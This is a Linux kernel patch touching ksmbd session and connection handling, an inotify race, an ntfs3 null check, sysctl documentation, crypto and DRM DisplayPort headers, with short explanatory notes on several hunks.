+ 	ksmbd_debug(SMB, "Received negotiate request\n");
+ 	conn->need_neg = false;
+-	if (ksmbd_conn_good(work)) {
++	if (ksmbd_conn_good(conn)) {
+ 		pr_err("conn->tcp_status is already in CifsGood State\n");
+ 		work->send_no_response = 1;
+ 		return rc;
+@@ -1230,7 +1222,7 @@ int smb2_handle_negotiate(struct ksmbd_work *work)
+ 	}
+ 
+ 	conn->srv_sec_mode = le16_to_cpu(rsp->SecurityMode);
+-	ksmbd_conn_set_need_negotiate(work);
++	ksmbd_conn_set_need_negotiate(conn);
+ 
+ err_out:
+ 	if (rc < 0)
+@@ -1521,19 +1513,14 @@ static int ntlm_authenticate(struct ksmbd_work *work)
+ 
+ binding_session:
+ 	if (conn->dialect >= SMB30_PROT_ID) {
+-		read_lock(&sess->chann_lock);
+ 		chann = lookup_chann_list(sess, conn);
+-		read_unlock(&sess->chann_lock);
+ 		if (!chann) {
+ 			chann = kmalloc(sizeof(struct channel), GFP_KERNEL);
+ 			if (!chann)
+ 				return -ENOMEM;
+ 
+ 			chann->conn = conn;
+-			INIT_LIST_HEAD(&chann->chann_list);
+-			write_lock(&sess->chann_lock);
+-			list_add(&chann->chann_list, &sess->ksmbd_chann_list);
+-			write_unlock(&sess->chann_lock);
++			xa_store(&sess->ksmbd_chann_list, (long)conn, chann, GFP_KERNEL);
+ 		}
+ 	}
+ 
+@@ -1608,19 +1595,14 @@ static int krb5_authenticate(struct ksmbd_work *work)
+ 	}
+ 
+ 	if (conn->dialect >= SMB30_PROT_ID) {
+-		read_lock(&sess->chann_lock);
+ 		chann = lookup_chann_list(sess, conn);
+-		read_unlock(&sess->chann_lock);
+ 		if (!chann) {
+ 			chann = kmalloc(sizeof(struct channel), GFP_KERNEL);
+ 			if (!chann)
+ 				return -ENOMEM;
+ 
+ 			chann->conn = conn;
+-			INIT_LIST_HEAD(&chann->chann_list);
+-			write_lock(&sess->chann_lock);
+-			list_add(&chann->chann_list, &sess->ksmbd_chann_list);
+-			write_unlock(&sess->chann_lock);
++			xa_store(&sess->ksmbd_chann_list, (long)conn, chann, GFP_KERNEL);
+ 		}
+ 	}
+ 
+@@ -1663,6 +1645,7 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 	rsp->SecurityBufferLength = 0;
+ 	inc_rfc1001_len(work->response_buf, 9);
+ 
++	ksmbd_conn_lock(conn);
+ 	if (!req->hdr.SessionId) {
+ 		sess = ksmbd_smb2_session_create();
+ 		if (!sess) {
+@@ -1710,6 +1693,12 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 			goto out_err;
+ 		}
+ 
++		if (ksmbd_conn_need_reconnect(conn)) {
++			rc = -EFAULT;
++			sess = NULL;
++			goto out_err;
++		}
++
+ 		if (ksmbd_session_lookup(conn, sess_id)) {
+ 			rc = -EACCES;
+ 			goto out_err;
+@@ -1734,12 +1723,20 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 			rc = -ENOENT;
+ 			goto out_err;
+ 		}
++
++		if (sess->state == SMB2_SESSION_EXPIRED) {
++			rc = -EFAULT;
++			goto out_err;
++		}
++
++		if (ksmbd_conn_need_reconnect(conn)) {
++			rc = -EFAULT;
++			sess = NULL;
++			goto out_err;
++		}
+ 	}
+ 	work->sess = sess;
+ 
+-	if (sess->state == SMB2_SESSION_EXPIRED)
+-		sess->state = SMB2_SESSION_IN_PROGRESS;
+-
+ 	negblob_off = le16_to_cpu(req->SecurityBufferOffset);
+ 	negblob_len = le16_to_cpu(req->SecurityBufferLength);
+ 	if (negblob_off < offsetof(struct smb2_sess_setup_req, Buffer) ||
+@@ -1769,8 +1766,10 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 				goto out_err;
+ 			}
+ 
+-			ksmbd_conn_set_good(work);
+-			sess->state = SMB2_SESSION_VALID;
++			if (!ksmbd_conn_need_reconnect(conn)) {
++				ksmbd_conn_set_good(conn);
++				sess->state = SMB2_SESSION_VALID;
++			}
+ 			kfree(sess->Preauth_HashValue);
+ 			sess->Preauth_HashValue = NULL;
+ 		} else if (conn->preferred_auth_mech == KSMBD_AUTH_NTLMSSP) {
+@@ -1792,8 +1791,10 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 				if (rc)
+ 					goto out_err;
+ 
+-				ksmbd_conn_set_good(work);
+-				sess->state = SMB2_SESSION_VALID;
++				if (!ksmbd_conn_need_reconnect(conn)) {
++					ksmbd_conn_set_good(conn);
++					sess->state = SMB2_SESSION_VALID;
++				}
+ 				if (conn->binding) {
+ 					struct preauth_session *preauth_sess;
+ 
+@@ -1861,14 +1862,17 @@ out_err:
+ 			if (sess->user && sess->user->flags & KSMBD_USER_FLAG_DELAY_SESSION)
+ 				try_delay = true;
+ 
+-			xa_erase(&conn->sessions, sess->id);
+-			ksmbd_session_destroy(sess);
+-			work->sess = NULL;
+-			if (try_delay)
++			sess->last_active = jiffies;
++			sess->state = SMB2_SESSION_EXPIRED;
++			if (try_delay) {
++				ksmbd_conn_set_need_reconnect(conn);
+ 				ssleep(5);
++				ksmbd_conn_set_need_negotiate(conn);
++			}
+ 		}
+ 	}
+ 
++	ksmbd_conn_unlock(conn);
+ 	return rc;
+ }
+ 
+@@ -2093,21 +2097,25 @@ int smb2_session_logoff(struct ksmbd_work *work)
+ {
+ 	struct ksmbd_conn *conn = work->conn;
+ 	struct smb2_logoff_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct ksmbd_session *sess = work->sess;
++	struct ksmbd_session *sess;
++	struct smb2_logoff_req *req = smb2_get_msg(work->request_buf);
++	u64 sess_id = le64_to_cpu(req->hdr.SessionId);
+ 
+ 	rsp->StructureSize = cpu_to_le16(4);
+ 	inc_rfc1001_len(work->response_buf, 4);
+ 
+ 	ksmbd_debug(SMB, "request\n");
+ 
+-	/* setting CifsExiting here may race with start_tcp_sess */
+-	ksmbd_conn_set_need_reconnect(work);
++	ksmbd_all_conn_set_status(sess_id, KSMBD_SESS_NEED_RECONNECT);
+ 	ksmbd_close_session_fds(work);
+-	ksmbd_conn_wait_idle(conn);
++	ksmbd_conn_wait_idle(conn, sess_id);
+ 
++	/*
++	 * Re-lookup session to validate if session is deleted
++	 * while waiting request complete
++	 */
++	sess = ksmbd_session_lookup_all(conn, sess_id);
+ 	if (ksmbd_tree_conn_session_logoff(sess)) {
+-		struct smb2_logoff_req *req = smb2_get_msg(work->request_buf);
+-
+ 		ksmbd_debug(SMB, "Invalid tid %d\n", req->hdr.Id.SyncId.TreeId);
+ 		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
+ 		smb2_set_err_rsp(work);
+@@ -2119,9 +2127,7 @@ int smb2_session_logoff(struct ksmbd_work *work)
+ 
+ 	ksmbd_free_user(sess->user);
+ 	sess->user = NULL;
+-
+-	/* let start_tcp_sess free connection info now */
+-	ksmbd_conn_set_need_negotiate(work);
++	ksmbd_all_conn_set_status(sess_id, KSMBD_SESS_NEED_NEGOTIATE);
+ 	return 0;
+ }
+ 
+@@ -6953,7 +6959,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 
+ 		nolock = 1;
+ 		/* check locks in connection list */
+-		read_lock(&conn_list_lock);
++		down_read(&conn_list_lock);
+ 		list_for_each_entry(conn, &conn_list, conns_list) {
+ 			spin_lock(&conn->llist_lock);
+ 			list_for_each_entry_safe(cmp_lock, tmp2, &conn->lock_list, clist) {
+@@ -6970,7 +6976,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 						list_del(&cmp_lock->flist);
+ 						list_del(&cmp_lock->clist);
+ 						spin_unlock(&conn->llist_lock);
+-						read_unlock(&conn_list_lock);
++						up_read(&conn_list_lock);
+ 
+ 						locks_free_lock(cmp_lock->fl);
+ 						kfree(cmp_lock);
+@@ -6992,7 +6998,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 				    cmp_lock->start > smb_lock->start &&
+ 				    cmp_lock->start < smb_lock->end) {
+ 					spin_unlock(&conn->llist_lock);
+-					read_unlock(&conn_list_lock);
++					up_read(&conn_list_lock);
+ 					pr_err("previous lock conflict with zero byte lock range\n");
+ 					goto out;
+ 				}
+@@ -7001,7 +7007,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 				    smb_lock->start > cmp_lock->start &&
+ 				    smb_lock->start < cmp_lock->end) {
+ 					spin_unlock(&conn->llist_lock);
+-					read_unlock(&conn_list_lock);
++					up_read(&conn_list_lock);
+ 					pr_err("current lock conflict with zero byte lock range\n");
+ 					goto out;
+ 				}
+@@ -7012,14 +7018,14 @@ int smb2_lock(struct ksmbd_work *work)
+ 				      cmp_lock->end >= smb_lock->end)) &&
+ 				    !cmp_lock->zero_len && !smb_lock->zero_len) {
+ 					spin_unlock(&conn->llist_lock);
+-					read_unlock(&conn_list_lock);
++					up_read(&conn_list_lock);
+ 					pr_err("Not allow lock operation on exclusive lock range\n");
+ 					goto out;
+ 				}
+ 			}
+ 			spin_unlock(&conn->llist_lock);
+ 		}
+-		read_unlock(&conn_list_lock);
++		up_read(&conn_list_lock);
+ out_check_cl:
+ 		if (smb_lock->fl->fl_type == F_UNLCK && nolock) {
+ 			pr_err("Try to unlock nolocked range\n");
+@@ -8434,14 +8440,11 @@ int smb3_check_sign_req(struct ksmbd_work *work)
+ 	if (le16_to_cpu(hdr->Command) == SMB2_SESSION_SETUP_HE) {
+ 		signing_key = work->sess->smb3signingkey;
+ 	} else {
+-		read_lock(&work->sess->chann_lock);
+ 		chann = lookup_chann_list(work->sess, conn);
+ 		if (!chann) {
+-			read_unlock(&work->sess->chann_lock);
+ 			return 0;
+ 		}
+ 		signing_key = chann->smb3signingkey;
+-		read_unlock(&work->sess->chann_lock);
+ 	}
+ 
+ 	if (!signing_key) {
+@@ -8501,14 +8504,11 @@ void smb3_set_sign_rsp(struct ksmbd_work *work)
+ 	    le16_to_cpu(hdr->Command) == SMB2_SESSION_SETUP_HE) {
+ 		signing_key = work->sess->smb3signingkey;
+ 	} else {
+-		read_lock(&work->sess->chann_lock);
+ 		chann = lookup_chann_list(work->sess, work->conn);
+ 		if (!chann) {
+-			read_unlock(&work->sess->chann_lock);
+ 			return;
+ 		}
+ 		signing_key = chann->smb3signingkey;
+-		read_unlock(&work->sess->chann_lock);
+ 	}
+ 
+ 	if (!signing_key)
+diff --git a/fs/ksmbd/smb2pdu.h b/fs/ksmbd/smb2pdu.h
+index 0c8a770fe3189..df05c9b2504d4 100644
+--- a/fs/ksmbd/smb2pdu.h
++++ b/fs/ksmbd/smb2pdu.h
+@@ -61,6 +61,8 @@ struct preauth_integrity_info {
+ #define SMB2_SESSION_IN_PROGRESS	BIT(0)
+ #define SMB2_SESSION_VALID		BIT(1)
+ 
++#define SMB2_SESSION_TIMEOUT		(10 * HZ)
++
+ struct create_durable_req_v2 {
+ 	struct create_context ccontext;
+ 	__u8   Name[8];
+diff --git a/fs/ksmbd/transport_tcp.c b/fs/ksmbd/transport_tcp.c
+index 20e85e2701f26..eff7a1d793f00 100644
+--- a/fs/ksmbd/transport_tcp.c
++++ b/fs/ksmbd/transport_tcp.c
+@@ -333,7 +333,7 @@ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+ 		if (length == -EINTR) {
+ 			total_read = -ESHUTDOWN;
+ 			break;
+-		} else if (conn->status == KSMBD_SESS_NEED_RECONNECT) {
++		} else if (ksmbd_conn_need_reconnect(conn)) {
+ 			total_read = -EAGAIN;
+ 			break;
+ 		} else if (length == -ERESTARTSYS || length == -EAGAIN) {
+diff --git a/fs/notify/inotify/inotify_fsnotify.c b/fs/notify/inotify/inotify_fsnotify.c
+index 49cfe2ae6d23d..993375f0db673 100644
+--- a/fs/notify/inotify/inotify_fsnotify.c
++++ b/fs/notify/inotify/inotify_fsnotify.c
+@@ -65,7 +65,7 @@ int inotify_handle_inode_event(struct fsnotify_mark *inode_mark, u32 mask,
+ 	struct fsnotify_event *fsn_event;
+ 	struct fsnotify_group *group = inode_mark->group;
+ 	int ret;
+-	int len = 0;
++	int len = 0, wd;
+ 	int alloc_len = sizeof(struct inotify_event_info);
+ 	struct mem_cgroup *old_memcg;
+ 
+@@ -80,6 +80,13 @@ int inotify_handle_inode_event(struct fsnotify_mark *inode_mark, u32 mask,
+ 	i_mark = container_of(inode_mark, struct inotify_inode_mark,
+ 			      fsn_mark);
+ 
++	/*
++	 * We can be racing with mark being detached. Don't report event with
++	 * invalid wd.
++	 */
++	wd = READ_ONCE(i_mark->wd);
++	if (wd == -1)
++		return 0;
+ 	/*
+ 	 * Whoever is interested in the event, pays for the allocation. Do not
+ 	 * trigger OOM killer in the target monitoring memcg as it may have
+@@ -110,7 +117,7 @@ int inotify_handle_inode_event(struct fsnotify_mark *inode_mark, u32 mask,
+ 	fsn_event = &event->fse;
+ 	fsnotify_init_event(fsn_event);
+ 	event->mask = mask;
+-	event->wd = i_mark->wd;
++	event->wd = wd;
+ 	event->sync_cookie = cookie;
+ 	event->name_len = len;
+ 	if (len)
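[Note: the point of the single READ_ONCE() snapshot in the inotify hunk is that i_mark->wd can flip to -1 (mark detached) between a check and a later use; loading it once and reusing the local closes that window. Assuming the detach path stores -1 to i_mark->wd, the safe shape is:

	int wd = READ_ONCE(i_mark->wd);	/* one load, one coherent value */

	if (wd == -1)
		return 0;		/* mark detached: suppress the event */
	/* ... */
	event->wd = wd;			/* never re-read i_mark->wd here */
]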
+diff --git a/fs/ntfs3/bitmap.c b/fs/ntfs3/bitmap.c
+index 723fb64e65316..393c726ef17a9 100644
+--- a/fs/ntfs3/bitmap.c
++++ b/fs/ntfs3/bitmap.c
+@@ -658,7 +658,8 @@ int wnd_init(struct wnd_bitmap *wnd, struct super_block *sb, size_t nbits)
+ 	if (!wnd->bits_last)
+ 		wnd->bits_last = wbits;
+ 
+-	wnd->free_bits = kcalloc(wnd->nwnd, sizeof(u16), GFP_NOFS | __GFP_NOWARN);
++	wnd->free_bits =
++		kcalloc(wnd->nwnd, sizeof(u16), GFP_NOFS | __GFP_NOWARN);
+ 	if (!wnd->free_bits)
+ 		return -ENOMEM;
+ 
+diff --git a/fs/ntfs3/frecord.c b/fs/ntfs3/frecord.c
+index f1df52dfab74b..7d0473da12c33 100644
+--- a/fs/ntfs3/frecord.c
++++ b/fs/ntfs3/frecord.c
+@@ -1645,7 +1645,7 @@ struct ATTR_FILE_NAME *ni_fname_name(struct ntfs_inode *ni,
+ {
+ 	struct ATTRIB *attr = NULL;
+ 	struct ATTR_FILE_NAME *fname;
+-       struct le_str *fns;
++	struct le_str *fns;
+ 
+ 	if (le)
+ 		*le = NULL;
+diff --git a/fs/ntfs3/fsntfs.c b/fs/ntfs3/fsntfs.c
+index 567563771bf89..24c9aeb5a49e0 100644
+--- a/fs/ntfs3/fsntfs.c
++++ b/fs/ntfs3/fsntfs.c
+@@ -2594,8 +2594,10 @@ static inline bool is_reserved_name(struct ntfs_sb_info *sbi,
+ 	if (len == 4 || (len > 4 && le16_to_cpu(name[4]) == '.')) {
+ 		port_digit = le16_to_cpu(name[3]);
+ 		if (port_digit >= '1' && port_digit <= '9')
+-			if (!ntfs_cmp_names(name, 3, COM_NAME, 3, upcase, false) ||
+-			    !ntfs_cmp_names(name, 3, LPT_NAME, 3, upcase, false))
++			if (!ntfs_cmp_names(name, 3, COM_NAME, 3, upcase,
++					    false) ||
++			    !ntfs_cmp_names(name, 3, LPT_NAME, 3, upcase,
++					    false))
+ 				return true;
+ 	}
+ 
+diff --git a/fs/ntfs3/namei.c b/fs/ntfs3/namei.c
+index c8db35e2ae172..53ddea219e377 100644
+--- a/fs/ntfs3/namei.c
++++ b/fs/ntfs3/namei.c
+@@ -88,6 +88,16 @@ static struct dentry *ntfs_lookup(struct inode *dir, struct dentry *dentry,
+ 		__putname(uni);
+ 	}
+ 
++	/*
++	 * Check for a null pointer
++	 * If the MFT record of ntfs inode is not a base record, inode->i_op can be NULL.
++	 * This causes null pointer dereference in d_splice_alias().
++	 */
++	if (!IS_ERR_OR_NULL(inode) && !inode->i_op) {
++		iput(inode);
++		inode = ERR_PTR(-EINVAL);
++	}
++
+ 	return d_splice_alias(inode, dentry);
+ }
+ 
+diff --git a/fs/ntfs3/ntfs.h b/fs/ntfs3/ntfs.h
+index 86ea1826d0998..90151e56c1222 100644
+--- a/fs/ntfs3/ntfs.h
++++ b/fs/ntfs3/ntfs.h
+@@ -435,9 +435,6 @@ static inline u64 attr_svcn(const struct ATTRIB *attr)
+ 	return attr->non_res ? le64_to_cpu(attr->nres.svcn) : 0;
+ }
+ 
+-/* The size of resident attribute by its resident size. */
+-#define BYTES_PER_RESIDENT(b) (0x18 + (b))
+-
+ static_assert(sizeof(struct ATTRIB) == 0x48);
+ static_assert(sizeof(((struct ATTRIB *)NULL)->res) == 0x08);
+ static_assert(sizeof(((struct ATTRIB *)NULL)->nres) == 0x38);
+diff --git a/fs/proc/proc_sysctl.c b/fs/proc/proc_sysctl.c
+index 436025e0f77a6..d20b3e5f64d0a 100644
+--- a/fs/proc/proc_sysctl.c
++++ b/fs/proc/proc_sysctl.c
+@@ -1287,7 +1287,10 @@ out:
+  * __register_sysctl_table - register a leaf sysctl table
+  * @set: Sysctl tree to register on
+  * @path: The path to the directory the sysctl table is in.
+- * @table: the top-level table structure
++ * @table: the top-level table structure without any child. This table
++ * 	 should not be free'd after registration. So it should not be
++ * 	 used on stack. It can either be a global or dynamically allocated
++ * 	 by the caller and free'd later after sysctl unregistration.
+  *
+  * Register a sysctl table hierarchy. @table should be a filled in ctl_table
+  * array. A completely 0 filled entry terminates the table.
+@@ -1308,9 +1311,12 @@ out:
+  * proc_handler - the text handler routine (described below)
+  *
+  * extra1, extra2 - extra pointers usable by the proc handler routines
++ * XXX: we should eventually modify these to use long min / max [0]
++ * [0] https://lkml.kernel.org/87zgpte9o4.fsf@email.froward.int.ebiederm.org
+  *
+  * Leaf nodes in the sysctl tree will be represented by a single file
+- * under /proc; non-leaf nodes will be represented by directories.
++ * under /proc; non-leaf nodes (where child is not NULL) are not allowed,
++ * sysctl_check_table() verifies this.
+  *
+  * There must be a proc_handler routine for any terminal nodes.
+  * Several default handlers are available to cover common cases -
+@@ -1352,7 +1358,7 @@ struct ctl_table_header *__register_sysctl_table(
+ 
+ 	spin_lock(&sysctl_lock);
+ 	dir = &set->dir;
+-	/* Reference moved down the diretory tree get_subdir */
++	/* Reference moved down the directory tree get_subdir */
+ 	dir->header.nreg++;
+ 	spin_unlock(&sysctl_lock);
+ 
+@@ -1369,6 +1375,11 @@ struct ctl_table_header *__register_sysctl_table(
+ 		if (namelen == 0)
+ 			continue;
+ 
++		/*
++		 * namelen ensures if name is "foo/bar/yay" only foo is
++		 * registered first. We traverse as if using mkdir -p and
++		 * return a ctl_dir for the last directory entry.
++		 */
+ 		dir = get_subdir(dir, name, namelen);
+ 		if (IS_ERR(dir))
+ 			goto fail;
+@@ -1394,8 +1405,15 @@ fail:
+ 
+ /**
+  * register_sysctl - register a sysctl table
+- * @path: The path to the directory the sysctl table is in.
+- * @table: the table structure
++ * @path: The path to the directory the sysctl table is in. If the path
++ * 	doesn't exist we will create it for you.
++ * @table: the table structure. The caller must ensure the life of the @table
++ * 	will be kept during the lifetime use of the sysctl. It must not be freed
++ * 	until unregister_sysctl_table() is called with the given returned table
++ * 	with this registration. If your code is non modular then you don't need
++ * 	to call unregister_sysctl_table() and can instead use something like
++ * 	register_sysctl_init() which does not care for the result of the sysctl
++ * 	registration.
+  *
+  * Register a sysctl table. @table should be a filled in ctl_table
+  * array. A completely 0 filled entry terminates the table.
+@@ -1411,8 +1429,11 @@ EXPORT_SYMBOL(register_sysctl);
+ 
+ /**
+  * __register_sysctl_init() - register sysctl table to path
+- * @path: path name for sysctl base
+- * @table: This is the sysctl table that needs to be registered to the path
++ * @path: path name for sysctl base. If that path doesn't exist we will create
++ * 	it for you.
++ * @table: This is the sysctl table that needs to be registered to the path.
++ * 	The caller must ensure the life of the @table will be kept during the
++ * 	lifetime use of the sysctl.
+  * @table_name: The name of sysctl table, only used for log printing when
+  *              registration fails
+  *
+@@ -1424,10 +1445,7 @@ EXPORT_SYMBOL(register_sysctl);
+  * register_sysctl() failing on init are extremely low, and so for both reasons
+  * this function does not return any error as it is used by initialization code.
+  *
+- * Context: Can only be called after your respective sysctl base path has been
+- * registered. So for instance, most base directories are registered early on
+- * init before init levels are processed through proc_sys_init() and
+- * sysctl_init_bases().
++ * Context: if your base directory does not exist it will be created for you.
+  */
+ void __init __register_sysctl_init(const char *path, struct ctl_table *table,
+ 				 const char *table_name)
+@@ -1557,6 +1575,7 @@ out:
+  *
+  * Register a sysctl table hierarchy. @table should be a filled in ctl_table
+  * array. A completely 0 filled entry terminates the table.
++ * We are slowly deprecating this call so avoid its use.
+  *
+  * See __register_sysctl_table for more details.
+  */
+@@ -1628,6 +1647,7 @@ err_register_leaves:
+  *
+  * Register a sysctl table hierarchy. @table should be a filled in ctl_table
+  * array. A completely 0 filled entry terminates the table.
++ * We are slowly deprecating this call so avoid future uses of it.
+  *
+  * See __register_sysctl_paths for more details.
+  */
+diff --git a/include/crypto/algapi.h b/include/crypto/algapi.h
+index 61b327206b557..1fd81e74a174f 100644
+--- a/include/crypto/algapi.h
++++ b/include/crypto/algapi.h
+@@ -302,4 +302,11 @@ enum {
+ 	CRYPTO_MSG_ALG_LOADED,
+ };
+ 
++static inline void crypto_request_complete(struct crypto_async_request *req,
++					   int err)
++{
++	crypto_completion_t complete = req->complete;
++	complete(req, err);
++}
++
+ #endif	/* _CRYPTO_ALGAPI_H */
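
The new crypto_request_complete() helper copies the callback out of the request before invoking it, because the callback itself is allowed to free or recycle the request, after which req->complete may no longer be valid to dereference. The same pattern in a self-contained sketch (illustrative types, not the crypto API):

	#include <stdlib.h>
	#include <stdio.h>

	typedef void (*completion_t)(void *req, int err);

	struct request {
		completion_t complete;
	};

	static void free_on_complete(void *req, int err)
	{
		printf("done, err=%d\n", err);
		free(req);				/* the callback may free the request */
	}

	static void complete_request(struct request *req, int err)
	{
		completion_t done = req->complete;	/* sample before the call ... */

		done(req, err);				/* ... req may be gone afterwards */
	}

	int main(void)
	{
		struct request *req = malloc(sizeof(*req));

		if (!req)
			return 1;
		req->complete = free_on_complete;
		complete_request(req, 0);
		return 0;
	}
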
+diff --git a/include/drm/display/drm_dp.h b/include/drm/display/drm_dp.h
+index e934aab357bea..05f2cc03d03d9 100644
+--- a/include/drm/display/drm_dp.h
++++ b/include/drm/display/drm_dp.h
+@@ -240,6 +240,8 @@
+ #define DP_DSC_SUPPORT                      0x060   /* DP 1.4 */
+ # define DP_DSC_DECOMPRESSION_IS_SUPPORTED  (1 << 0)
+ # define DP_DSC_PASSTHROUGH_IS_SUPPORTED    (1 << 1)
++# define DP_DSC_DYNAMIC_PPS_UPDATE_SUPPORT_COMP_TO_COMP    (1 << 2)
++# define DP_DSC_DYNAMIC_PPS_UPDATE_SUPPORT_UNCOMP_TO_COMP  (1 << 3)
+ 
+ #define DP_DSC_REV                          0x061
+ # define DP_DSC_MAJOR_MASK                  (0xf << 0)
+@@ -278,12 +280,14 @@
+ 
+ #define DP_DSC_BLK_PREDICTION_SUPPORT       0x066
+ # define DP_DSC_BLK_PREDICTION_IS_SUPPORTED (1 << 0)
++# define DP_DSC_RGB_COLOR_CONV_BYPASS_SUPPORT (1 << 1)
+ 
+ #define DP_DSC_MAX_BITS_PER_PIXEL_LOW       0x067   /* eDP 1.4 */
+ 
+ #define DP_DSC_MAX_BITS_PER_PIXEL_HI        0x068   /* eDP 1.4 */
+ # define DP_DSC_MAX_BITS_PER_PIXEL_HI_MASK  (0x3 << 0)
+-# define DP_DSC_MAX_BITS_PER_PIXEL_HI_SHIFT 8
++# define DP_DSC_MAX_BPP_DELTA_VERSION_MASK  (0x3 << 5)	/* eDP 1.5 & DP 2.0 */
++# define DP_DSC_MAX_BPP_DELTA_AVAILABILITY  (1 << 7)	/* eDP 1.5 & DP 2.0 */
+ 
+ #define DP_DSC_DEC_COLOR_FORMAT_CAP         0x069
+ # define DP_DSC_RGB                         (1 << 0)
+@@ -345,11 +349,13 @@
+ # define DP_DSC_24_PER_DP_DSC_SINK          (1 << 2)
+ 
+ #define DP_DSC_BITS_PER_PIXEL_INC           0x06F
++# define DP_DSC_RGB_YCbCr444_MAX_BPP_DELTA_MASK 0x1f
++# define DP_DSC_RGB_YCbCr420_MAX_BPP_DELTA_MASK 0xe0
+ # define DP_DSC_BITS_PER_PIXEL_1_16         0x0
+ # define DP_DSC_BITS_PER_PIXEL_1_8          0x1
+ # define DP_DSC_BITS_PER_PIXEL_1_4          0x2
+ # define DP_DSC_BITS_PER_PIXEL_1_2          0x3
+-# define DP_DSC_BITS_PER_PIXEL_1            0x4
++# define DP_DSC_BITS_PER_PIXEL_1_1          0x4
+ 
+ #define DP_PSR_SUPPORT                      0x070   /* XXX 1.2? */
+ # define DP_PSR_IS_SUPPORTED                1
+diff --git a/include/drm/display/drm_dp_helper.h b/include/drm/display/drm_dp_helper.h
+index ab55453f2d2cd..ade9df59e156a 100644
+--- a/include/drm/display/drm_dp_helper.h
++++ b/include/drm/display/drm_dp_helper.h
+@@ -181,9 +181,8 @@ static inline u16
+ drm_edp_dsc_sink_output_bpp(const u8 dsc_dpcd[DP_DSC_RECEIVER_CAP_SIZE])
+ {
+ 	return dsc_dpcd[DP_DSC_MAX_BITS_PER_PIXEL_LOW - DP_DSC_SUPPORT] |
+-		(dsc_dpcd[DP_DSC_MAX_BITS_PER_PIXEL_HI - DP_DSC_SUPPORT] &
+-		 DP_DSC_MAX_BITS_PER_PIXEL_HI_MASK <<
+-		 DP_DSC_MAX_BITS_PER_PIXEL_HI_SHIFT);
++		((dsc_dpcd[DP_DSC_MAX_BITS_PER_PIXEL_HI - DP_DSC_SUPPORT] &
++		  DP_DSC_MAX_BITS_PER_PIXEL_HI_MASK) << 8);
+ }
+ 
+ static inline u32
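
The drm_dp_helper change above fixes an operator-precedence bug: `<<` binds tighter than `&` in C, so the old expression ANDed against a pre-shifted mask (always selecting the wrong bits) instead of masking first and then shifting the result into place. A compilable demonstration with illustrative values:

	#include <stdio.h>

	#define MASK	0x3
	#define SHIFT	8

	int main(void)
	{
		unsigned int hi = 0x03;	/* the two significant bits are set */

		/* buggy: & binds looser than <<, so this is hi & (MASK << SHIFT) == 0 */
		printf("buggy: 0x%x\n", hi & MASK << SHIFT);

		/* fixed: mask first, then shift the masked value into position */
		printf("fixed: 0x%x\n", (hi & MASK) << SHIFT);
		return 0;
	}
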
+diff --git a/include/linux/crypto.h b/include/linux/crypto.h
+index 5d1e961f810ec..b18f6e669fb10 100644
+--- a/include/linux/crypto.h
++++ b/include/linux/crypto.h
+@@ -176,6 +176,7 @@ struct crypto_async_request;
+ struct crypto_tfm;
+ struct crypto_type;
+ 
++typedef struct crypto_async_request crypto_completion_data_t;
+ typedef void (*crypto_completion_t)(struct crypto_async_request *req, int err);
+ 
+ /**
+@@ -595,6 +596,11 @@ struct crypto_wait {
+ /*
+ * Async ops completion helper functions
+  */
++static inline void *crypto_get_completion_data(crypto_completion_data_t *req)
++{
++	return req->data;
++}
++
+ void crypto_req_done(struct crypto_async_request *req, int err);
+ 
+ static inline int crypto_wait_req(int err, struct crypto_wait *wait)
+diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h
+index 45c3d62e616d8..95f33dadb2be2 100644
+--- a/include/linux/pci_ids.h
++++ b/include/linux/pci_ids.h
+@@ -567,6 +567,7 @@
+ #define PCI_DEVICE_ID_AMD_19H_M50H_DF_F3 0x166d
+ #define PCI_DEVICE_ID_AMD_19H_M60H_DF_F3 0x14e3
+ #define PCI_DEVICE_ID_AMD_19H_M70H_DF_F3 0x14f3
++#define PCI_DEVICE_ID_AMD_19H_M78H_DF_F3 0x12fb
+ #define PCI_DEVICE_ID_AMD_CNB17H_F3	0x1703
+ #define PCI_DEVICE_ID_AMD_LANCE		0x2000
+ #define PCI_DEVICE_ID_AMD_LANCE_HOME	0x2001
+diff --git a/include/net/af_rxrpc.h b/include/net/af_rxrpc.h
+index ba717eac0229a..73644bd42a3f9 100644
+--- a/include/net/af_rxrpc.h
++++ b/include/net/af_rxrpc.h
+@@ -40,16 +40,17 @@ typedef void (*rxrpc_user_attach_call_t)(struct rxrpc_call *, unsigned long);
+ void rxrpc_kernel_new_call_notification(struct socket *,
+ 					rxrpc_notify_new_call_t,
+ 					rxrpc_discard_new_call_t);
+-struct rxrpc_call *rxrpc_kernel_begin_call(struct socket *,
+-					   struct sockaddr_rxrpc *,
+-					   struct key *,
+-					   unsigned long,
+-					   s64,
+-					   gfp_t,
+-					   rxrpc_notify_rx_t,
+-					   bool,
+-					   enum rxrpc_interruptibility,
+-					   unsigned int);
++struct rxrpc_call *rxrpc_kernel_begin_call(struct socket *sock,
++					   struct sockaddr_rxrpc *srx,
++					   struct key *key,
++					   unsigned long user_call_ID,
++					   s64 tx_total_len,
++					   u32 hard_timeout,
++					   gfp_t gfp,
++					   rxrpc_notify_rx_t notify_rx,
++					   bool upgrade,
++					   enum rxrpc_interruptibility interruptibility,
++					   unsigned int debug_id);
+ int rxrpc_kernel_send_data(struct socket *, struct rxrpc_call *,
+ 			   struct msghdr *, size_t,
+ 			   rxrpc_notify_end_tx_t);
+diff --git a/kernel/locking/rwsem.c b/kernel/locking/rwsem.c
+index 84d5b649b95fe..92d8e2c4edda0 100644
+--- a/kernel/locking/rwsem.c
++++ b/kernel/locking/rwsem.c
+@@ -1251,7 +1251,7 @@ static struct rw_semaphore *rwsem_downgrade_wake(struct rw_semaphore *sem)
+ /*
+  * lock for reading
+  */
+-static inline int __down_read_common(struct rw_semaphore *sem, int state)
++static __always_inline int __down_read_common(struct rw_semaphore *sem, int state)
+ {
+ 	int ret = 0;
+ 	long count;
